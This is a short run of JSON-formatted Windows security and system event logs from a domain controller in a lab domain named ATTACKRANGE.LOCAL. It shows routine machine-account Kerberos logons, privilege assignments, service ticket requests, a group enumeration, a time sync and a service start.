{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220287,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x451F7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49703\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x451f7","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49703","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220288,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220289,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4535F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4535f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220290,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4535F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49704\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4535f","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49704","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220291,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45479\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45479","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220292,"ProcessID":864,"ThreadID":908,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45479\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49706\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45479","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49706","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76835,"ProcessID":1196,"ThreadID":1384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76836,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The NetSetupSvc service entered the running state.","param1":"NetSetupSvc","param2":"running","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220293,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45685\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45685","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220294,"ProcessID":864,"ThreadID":3032,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45685\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t49707\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45685","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"49707","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220295,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x474\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0x474","CallerProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220296,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220297,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45DFA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45dfa","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
